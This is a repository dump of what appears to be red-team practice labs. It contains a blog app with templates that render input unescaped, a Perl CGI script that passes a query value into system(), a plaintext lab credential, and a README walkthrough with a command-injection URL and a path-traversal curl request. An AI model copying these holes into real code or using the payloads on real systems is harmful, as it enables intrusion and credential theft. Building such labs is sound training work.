| } 227 | } 228 | } 229 | 230 | // Post Preview Pages 231 | 232 | .post-preview { 233 | > a { 234 | color: @gray-dark; 235 | &:hover, 236 | &:focus { 237 | text-decoration: none; 238 | color: @brand-primary; 239 | } 240 | > .post-title { 241 | font-size: 30px; 242 | margin-top: 30px; 243 | margin-bottom: 10px; 244 | } 245 | > .post-subtitle { 246 | margin: 0; 247 | font-weight: 300; 248 | margin-bottom: 10px; 249 | } 250 | } 251 | > .post-meta { 252 | color: @gray; 253 | font-size: 18px; 254 | font-style: italic; 255 | margin-top: 0; 256 | > a { 257 | text-decoration: none; 258 | color: @gray-dark; 259 | &:hover, 260 | &:focus { 261 | color: @brand-primary; 262 | text-decoration: underline; 263 | } 264 | } 265 | } 266 | @media only screen and (min-width: 768px) { 267 | > a { 268 | > .post-title { 269 | font-size: 36px; 270 | } 271 | } 272 | } 273 | } 274 | 275 | // Sections 276 | 277 | .section-heading { 278 | font-size: 36px; 279 | margin-top: 60px; 280 | font-weight: 700; 281 | } 282 | 283 | .caption { 284 | text-align: center; 285 | font-size: 14px; 286 | padding: 10px; 287 | font-style: italic; 288 | margin: 0; 289 | display: block; 290 | border-bottom-right-radius: 5px; 291 | border-bottom-left-radius: 5px; 292 | } 293 | 294 | footer { 295 | padding: 50px 0 65px; 296 | .list-inline { 297 | margin: 0; 298 | padding: 0; 299 | } 300 | .copyright { 301 | font-size: 14px; 302 | text-align: center; 303 | margin-bottom: 0; 304 | } 305 | } 306 | 307 | // Contact Form Styles 308 | 309 | .floating-label-form-group { 310 | font-size: 14px; 311 | position: relative; 312 | margin-bottom: 0; 313 | padding-bottom: 0.5em; 314 | border-bottom: 1px solid @gray-light; 315 | input, 316 | textarea { 317 | z-index: 1; 318 | position: relative; 319 | padding-right: 0; 320 | padding-left: 0; 321 | border: none; 322 | border-radius: 0; 323 | font-size: 1.5em; 324 | background: none; 325 | box-shadow: none !important; 326 | resize: none; 327 | } 328 | label { 329 | display: block; 330 | z-index: 0; 331 | position: relative; 332 | top: 2em; 333 | margin: 0; 334 | font-size: 0.85em; 335 | line-height: 1.764705882em; 336 | vertical-align: middle; 337 | vertical-align: baseline; 338 | opacity: 0; 339 | -webkit-transition: top 0.3s ease,opacity 0.3s ease; 340 | -moz-transition: top 0.3s ease,opacity 0.3s ease; 341 | -ms-transition: top 0.3s ease,opacity 0.3s ease; 342 | transition: top 0.3s ease,opacity 0.3s ease; 343 | } 344 | &::not(:first-child) { 345 | padding-left: 14px; 346 | border-left: 1px solid @gray-light; 347 | } 348 | } 349 | 350 | .floating-label-form-group-with-value { 351 | label { 352 | top: 0; 353 | opacity: 1; 354 | } 355 | } 356 | 357 | .floating-label-form-group-with-focus { 358 | label { 359 | color: @brand-primary; 360 | } 361 | } 362 | 363 | form .row:first-child .floating-label-form-group { 364 | border-top: 1px solid @gray-light; 365 | } 366 | 367 | // Button Styles 368 | 369 | .btn { 370 | .sans-serif; 371 | text-transform: uppercase; 372 | font-size: 14px; 373 | font-weight: 800; 374 | letter-spacing: 1px; 375 | border-radius: 0; 376 | padding: 15px 25px; 377 | } 378 | 379 | .btn-lg { 380 | font-size: 16px; 381 | padding: 25px 35px; 382 | } 383 | 384 | .btn-default { 385 | &:hover, 386 | &:focus { 387 | background-color: @brand-primary; 388 | border: 1px solid @brand-primary; 389 | color: white; 390 | } 391 | } 392 | 393 | // Pager Styling 394 | 395 | .pager { 396 | 397 | margin: 20px 0 0; 398 | 399 | li { 400 | > a, 401 | > span { 402 | .sans-serif; 403 | text-transform: uppercase; 404 | font-size: 14px; 405 | font-weight: 800; 406 | letter-spacing: 1px; 407 | padding: 15px 25px; 408 | background-color: white; 409 | border-radius: 0; 410 | } 411 | 412 | > a:hover, 413 | > a:focus { 414 | color: white; 415 | background-color: @brand-primary; 416 | border: 1px solid @brand-primary; 417 | } 418 | } 419 | 420 | .disabled { 421 | > a, 422 | > a:hover, 423 | > a:focus, 424 | > span { 425 | color: @gray; 426 | background-color: @gray-dark; 427 | cursor: not-allowed; 428 | } 429 | } 430 | } 431 | 432 | // -- Highlight Color Customization 433 | 434 | ::-moz-selection { 435 | color: white; 436 | text-shadow: none; 437 | background: @brand-primary; 438 | } 439 | 440 | ::selection { 441 | color: white; 442 | text-shadow: none; 443 | background: @brand-primary; 444 | } 445 | 446 | img::selection { 447 | color: white; 448 | background: transparent; 449 | } 450 | 451 | img::-moz-selection { 452 | color: white; 453 | background: transparent; 454 | } 455 | 456 | body { 457 | webkit-tap-highlight-color: @brand-primary; 458 | } -------------------------------------------------------------------------------- /knasty/static/less/mixins.less: -------------------------------------------------------------------------------- 1 | // Mixins 2 | 3 | .transition-all() { 4 | -webkit-transition: all 0.5s; 5 | -moz-transition: all 0.5s; 6 | transition: all 0.5s; 7 | } 8 | 9 | .background-cover() { 10 | -webkit-background-size: cover; 11 | -moz-background-size: cover; 12 | background-size: cover; 13 | -o-background-size: cover; 14 | } 15 | 16 | .serif() { 17 | font-family: 'Lora', 'Times New Roman', serif; 18 | } 19 | 20 | .sans-serif () { 21 | font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; 22 | } -------------------------------------------------------------------------------- /knasty/static/less/variables.less: -------------------------------------------------------------------------------- 1 | // Variables 2 | 3 | @brand-primary: #0085A1; 4 | @gray-dark: lighten(black, 25%); 5 | @gray: lighten(black, 50%); 6 | @white-faded: fade(white, 80%); 7 | @gray-light: #eee; -------------------------------------------------------------------------------- /knasty/static/uploads/69823596_1365225413642464_3591290995368525824_n.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/uploads/69823596_1365225413642464_3591290995368525824_n.jpg -------------------------------------------------------------------------------- /knasty/templates/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | {% block body %} 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | Not Found : 404 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 28 | 29 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 73 | 74 | 75 | 76 |
77 |
78 |
79 |
80 |
81 |

Not Found : 404

82 |
83 |
84 |
85 |
86 |
87 |
88 | {% endblock %} 89 | 90 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | -------------------------------------------------------------------------------- /knasty/templates/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2013-2015 Iron Summit Media Strategies, LLC 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | 203 | -------------------------------------------------------------------------------- /knasty/templates/about.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | {{ Name }} - About 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 23 | 24 | 25 | 26 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 70 | 71 | 72 | 73 |
74 |
75 |
76 |
77 |
78 |

About Me

79 |
80 | This is what I do. 81 |
82 |
83 |
84 |
85 |
86 | 87 | 88 |
89 |
90 |
91 |

My First Blog .. im make it :)

92 |
93 |
94 |
95 | 96 |
97 | 98 | 99 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /knasty/templates/contact.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | {{ Name }} - Contact 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 71 | 72 | 73 | 74 |
75 |
76 |
77 |
78 |
79 |

Contact Me

80 |
81 | Have questions? I have answers (maybe). 82 |
83 |
84 |
85 |
86 |
87 | 88 | 89 |
90 |
91 |
92 |

Want to get in touch with me? Fill out the form below to send me a message and I will try to get back to you within 24 hours!

93 | 94 | 95 | 96 |
97 |
98 |
99 | 100 | 101 |

102 |
103 |
104 |
105 |
106 | 107 | 108 |

109 |
110 |
111 |
112 |
113 | 114 | 115 |

116 |
117 |
118 |
119 |
120 | 121 | 122 |

123 |
124 |
125 |
126 |
127 |
128 |
129 | 130 |
131 |
132 |
133 |
134 |
135 |
136 | 137 |
138 | 139 | 140 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | -------------------------------------------------------------------------------- /knasty/templates/edite.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 | {% if session.user %} 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | {{ Name }} 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 27 | 28 | 32 | 33 | 34 | 35 | {% for entry in entries %} 36 |
37 |
38 |
Title: 39 |
40 |
Description:
41 |
42 |
Text: 43 |
44 |
45 |
46 |
47 |
48 | 49 |
50 | {% endfor %} 51 | {% endif %} 52 | {% endblock %} 53 | 54 | -------------------------------------------------------------------------------- /knasty/templates/file_upload_form.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | {{ Name }} 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 25 | 26 | 30 | 31 | 32 | 33 |
34 | 35 | 36 |
37 | 38 | 39 | -------------------------------------------------------------------------------- /knasty/templates/img.html: -------------------------------------------------------------------------------- 1 | 2 | {% for entry in entries %} 3 |

ID : {{entry.id}}

 4 |

Name : {{ entry.link|safe }}

5 | 6 | {% endfor %} -------------------------------------------------------------------------------- /knasty/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | {% block body %} 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | {{ Name }} 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 28 | 29 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 82 | 83 | 84 | 85 |
86 |
87 |
88 |
89 |
90 |

{{ Name }}

91 |
92 |
93 |
94 |
95 |
96 |
97 | 98 |
99 |
100 |
101 | {% for entry in entries %} 102 |
103 | 104 |

105 | {{ entry.title }} 106 |

107 |

108 | {{ entry.description|safe }} 109 |

110 | 111 |

Posted by admin on {{ entry.d }}

112 |
113 | {% endfor %} 114 |
115 | 116 | 117 | 118 | 123 |
124 |
125 |
126 | 127 |
128 | 129 | {% endblock %} 130 | 131 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | -------------------------------------------------------------------------------- /knasty/templates/layout.html: -------------------------------------------------------------------------------- 1 | 2 | Admin Panel 3 | 4 |
5 |

Admin Panel

6 |
7 | {% if not session.user %} 8 | log in 9 | {% else %} 10 | log out 11 | {% endif %} 12 |
13 | {% for message in get_flashed_messages() %} 14 |
{{ message }}
15 | {% endfor %} 16 | {% block body %}{% endblock %} 17 |
-------------------------------------------------------------------------------- /knasty/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | 3 | {% block body %} 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | {{ Name }} 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 26 | 27 | 31 | 32 | 33 | 34 |

Login

35 | {% if error %}

Error: {{ error }}{% endif %} 36 |

37 |
38 |
Username: 39 |
40 |
Password: 41 |
42 |
43 |
44 |
45 | {% endblock %} 46 | 47 | -------------------------------------------------------------------------------- /knasty/templates/post.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | Hacking Blog 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 32 | 33 | 34 | 35 | 36 | 37 | 71 | 72 | 73 | 74 |
75 |
76 |
77 |
78 |
79 |

80 |
81 |
82 |
83 |
84 |
85 | 86 |
87 |
88 |
89 |
90 | {% for entry in entries %} 91 | 92 |

{{ entry.title }}

93 | 94 |

{{ entry.description }}

95 |

{{ entry.text }}

96 | Posted by Admin on {{ entry.d }} 97 | {% endfor %} 98 |
99 |
100 |
101 |
102 | 103 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | -------------------------------------------------------------------------------- /knasty/templates/search.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Search 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 24 | 25 | 29 | 30 | 31 | 32 |

Search

33 |
34 | 35 | 36 |
37 | {{ output|safe }} 38 | 39 | 40 | -------------------------------------------------------------------------------- /knasty/templates/show_entries.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 | {% if session.user %} 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | {{ Name }} 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 28 | 29 | 33 | 34 | 35 | 36 |
37 |
38 |
Title: 39 |
40 |
Description:
41 |
42 |
Text: 43 |
44 |
45 |
46 |
47 |

POSTS :

48 | {% for entry in entries %} 49 |

{{ entry.title }}

| Edit |

50 | {% endfor %} 51 | {% endif %} 52 | {% endblock %} 53 | 54 | -------------------------------------------------------------------------------- /knasty/templates/success.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | success 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 25 | 26 | 30 | 31 | 32 | 33 |

File uploaded successfully

34 |

File Name: {{ name|safe }}

35 | 36 | 37 | -------------------------------------------------------------------------------- /travesty/README.md: -------------------------------------------------------------------------------- 1 | # Travesty 2 | Find the vulnerabilities on the website that can be breached in a few different ways. Can you get the local users' login creds? 3 | 4 | Thanks https://github.com/twseptian/cve-2021-42013-docker-lab/ for the idea and some code. 5 | 6 |
7 | Hint 8 | Look for a CVE for this technology. Where can you see details about the technology in use? 9 |
10 | 11 |
12 | Walkthrough 13 | 14 | 1. For RCE, hit 15 | ``` 16 | http://localhost/cgi-bin/get_time.pl?timezone=b;COMMAND 17 | ``` 18 | 2. Or Path Traversal for file disclosure: 19 | ``` 20 | curl -s --path-as-is "http://localhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/backups.sh" 21 | ``` 22 |
-------------------------------------------------------------------------------- /travesty/backups.sh: -------------------------------------------------------------------------------- 1 | # file does some cool backups by using these creds for scp 2 | # trevor:jkX82Bf3 3 | # ... 4 | # ...some stuff... 5 | # ... -------------------------------------------------------------------------------- /travesty/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | apt-get update 3 | apt-get install net-tools 4 | useradd -p jkX82Bf3 trevor 5 | apachectl restart 6 | tail -F /anything.asdf -------------------------------------------------------------------------------- /travesty/get_time.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | $buffer = $ENV{'QUERY_STRING'}; 4 | #split information into key/value pairs 5 | @pairs = split(/&/, $buffer); 6 | foreach $pair (@pairs) 7 | { 8 | ($name, $value) = split(/=/, $pair); 9 | $value =~ tr/+/ /; 10 | $value =~ s/%([a-fA-F0-9] [a-fA-F0-9])/pack("C", hex($1))/eg; 11 | $value =~ s/~!/ ~!/g; 12 | $FORM{$name} = $value; 13 | } 14 | 15 | $tz = $FORM{'timezone'}; 16 | 17 | print "Content-type:text/html\r\n\r\n"; 18 | print ""; 19 | print ""; 20 | print "GeeksForGeeks - Get Method"; 21 | print ""; 22 | print ""; 23 | print "

Getting time for '$tz'
"; 24 | system("TZ=$tz"); 25 | print "

" + system("date") + "

"; 26 | print ""; 27 | print ""; 28 | # backup the time stuff at /home/backups.sh 29 | 30 | 1; -------------------------------------------------------------------------------- /travesty/httpd.conf: -------------------------------------------------------------------------------- 1 | # cat httpd.conf 2 | # 3 | # This is the main Apache HTTP server configuration file. It contains the 4 | # configuration directives that give the server its instructions. 5 | # See for detailed information. 6 | # In particular, see 7 | # 8 | # for a discussion of each configuration directive. 9 | # 10 | # Do NOT simply read the instructions in here without understanding 11 | # what they do. They're here only as hints or reminders. If you are unsure 12 | # consult the online docs. You have been warned. 13 | # 14 | # Configuration and logfile names: If the filenames you specify for many 15 | # of the server's control files begin with "/" (or "drive:/" for Win32), the 16 | # server will use that explicit path. If the filenames do *not* begin 17 | # with "/", the value of ServerRoot is prepended -- so "logs/access_log" 18 | # with ServerRoot set to "/usr/local/apache2" will be interpreted by the 19 | # server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log" 20 | # will be interpreted as '/logs/access_log'. 21 | 22 | # 23 | # ServerRoot: The top of the directory tree under which the server's 24 | # configuration, error, and log files are kept. 25 | # 26 | # Do not add a slash at the end of the directory path. If you point 27 | # ServerRoot at a non-local disk, be sure to specify a local disk on the 28 | # Mutex directive, if file-based mutexes are used. If you wish to share the 29 | # same ServerRoot for multiple httpd daemons, you will need to change at 30 | # least PidFile. 31 | # 32 | ServerRoot "/usr/local/apache2" 33 | 34 | # 35 | # Mutex: Allows you to set the mutex mechanism and mutex file directory 36 | # for individual mutexes, or change the global defaults 37 | # 38 | # Uncomment and change the directory if mutexes are file-based and the default 39 | # mutex file directory is not on a local disk or is not appropriate for some 40 | # other reason. 41 | # 42 | # Mutex default:logs 43 | 44 | # 45 | # Listen: Allows you to bind Apache to specific IP addresses and/or 46 | # ports, instead of the default. See also the 47 | # directive. 48 | # 49 | # Change this to Listen on specific IP addresses as shown below to 50 | # prevent Apache from glomming onto all bound IP addresses. 51 | # 52 | #Listen 12.34.56.78:80 53 | Listen 80 54 | 55 | # 56 | # Dynamic Shared Object (DSO) Support 57 | # 58 | # To be able to use the functionality of a module which was built as a DSO you 59 | # have to place corresponding `LoadModule' lines at this location so the 60 | # directives contained in it are actually available _before_ they are used. 61 | # Statically compiled modules (those listed by `httpd -l') do not need 62 | # to be loaded here. 63 | # 64 | # Example: 65 | # LoadModule foo_module modules/mod_foo.so 66 | # 67 | LoadModule mpm_event_module modules/mod_mpm_event.so 68 | #LoadModule mpm_prefork_module modules/mod_mpm_prefork.so 69 | #LoadModule mpm_worker_module modules/mod_mpm_worker.so 70 | LoadModule authn_file_module modules/mod_authn_file.so 71 | #LoadModule authn_dbm_module modules/mod_authn_dbm.so 72 | #LoadModule authn_anon_module modules/mod_authn_anon.so 73 | #LoadModule authn_dbd_module modules/mod_authn_dbd.so 74 | #LoadModule authn_socache_module modules/mod_authn_socache.so 75 | LoadModule authn_core_module modules/mod_authn_core.so 76 | LoadModule authz_host_module modules/mod_authz_host.so 77 | LoadModule authz_groupfile_module modules/mod_authz_groupfile.so 78 | LoadModule authz_user_module modules/mod_authz_user.so 79 | #LoadModule authz_dbm_module modules/mod_authz_dbm.so 80 | #LoadModule authz_owner_module modules/mod_authz_owner.so 81 | #LoadModule authz_dbd_module modules/mod_authz_dbd.so 82 | LoadModule authz_core_module modules/mod_authz_core.so 83 | #LoadModule authnz_ldap_module modules/mod_authnz_ldap.so 84 | #LoadModule authnz_fcgi_module modules/mod_authnz_fcgi.so 85 | LoadModule access_compat_module modules/mod_access_compat.so 86 | LoadModule auth_basic_module modules/mod_auth_basic.so 87 | #LoadModule auth_form_module modules/mod_auth_form.so 88 | #LoadModule auth_digest_module modules/mod_auth_digest.so 89 | #LoadModule allowmethods_module modules/mod_allowmethods.so 90 | #LoadModule isapi_module modules/mod_isapi.so 91 | #LoadModule file_cache_module modules/mod_file_cache.so 92 | #LoadModule cache_module modules/mod_cache.so 93 | #LoadModule cache_disk_module modules/mod_cache_disk.so 94 | #LoadModule cache_socache_module modules/mod_cache_socache.so 95 | #LoadModule socache_shmcb_module modules/mod_socache_shmcb.so 96 | #LoadModule socache_dbm_module modules/mod_socache_dbm.so 97 | #LoadModule socache_memcache_module modules/mod_socache_memcache.so 98 | #LoadModule socache_redis_module modules/mod_socache_redis.so 99 | #LoadModule watchdog_module modules/mod_watchdog.so 100 | #LoadModule macro_module modules/mod_macro.so 101 | #LoadModule dbd_module modules/mod_dbd.so 102 | #LoadModule bucketeer_module modules/mod_bucketeer.so 103 | #LoadModule dumpio_module modules/mod_dumpio.so 104 | #LoadModule echo_module modules/mod_echo.so 105 | #LoadModule example_hooks_module modules/mod_example_hooks.so 106 | #LoadModule case_filter_module modules/mod_case_filter.so 107 | #LoadModule case_filter_in_module modules/mod_case_filter_in.so 108 | #LoadModule example_ipc_module modules/mod_example_ipc.so 109 | #LoadModule buffer_module modules/mod_buffer.so 110 | #LoadModule data_module modules/mod_data.so 111 | #LoadModule ratelimit_module modules/mod_ratelimit.so 112 | LoadModule reqtimeout_module modules/mod_reqtimeout.so 113 | #LoadModule ext_filter_module modules/mod_ext_filter.so 114 | #LoadModule request_module modules/mod_request.so 115 | #LoadModule include_module modules/mod_include.so 116 | LoadModule filter_module modules/mod_filter.so 117 | #LoadModule reflector_module modules/mod_reflector.so 118 | #LoadModule substitute_module modules/mod_substitute.so 119 | #LoadModule sed_module modules/mod_sed.so 120 | #LoadModule charset_lite_module modules/mod_charset_lite.so 121 | #LoadModule deflate_module modules/mod_deflate.so 122 | #LoadModule xml2enc_module modules/mod_xml2enc.so 123 | #LoadModule proxy_html_module modules/mod_proxy_html.so 124 | #LoadModule brotli_module modules/mod_brotli.so 125 | LoadModule mime_module modules/mod_mime.so 126 | #LoadModule ldap_module modules/mod_ldap.so 127 | LoadModule log_config_module modules/mod_log_config.so 128 | #LoadModule log_debug_module modules/mod_log_debug.so 129 | #LoadModule log_forensic_module modules/mod_log_forensic.so 130 | #LoadModule logio_module modules/mod_logio.so 131 | #LoadModule lua_module modules/mod_lua.so 132 | LoadModule env_module modules/mod_env.so 133 | 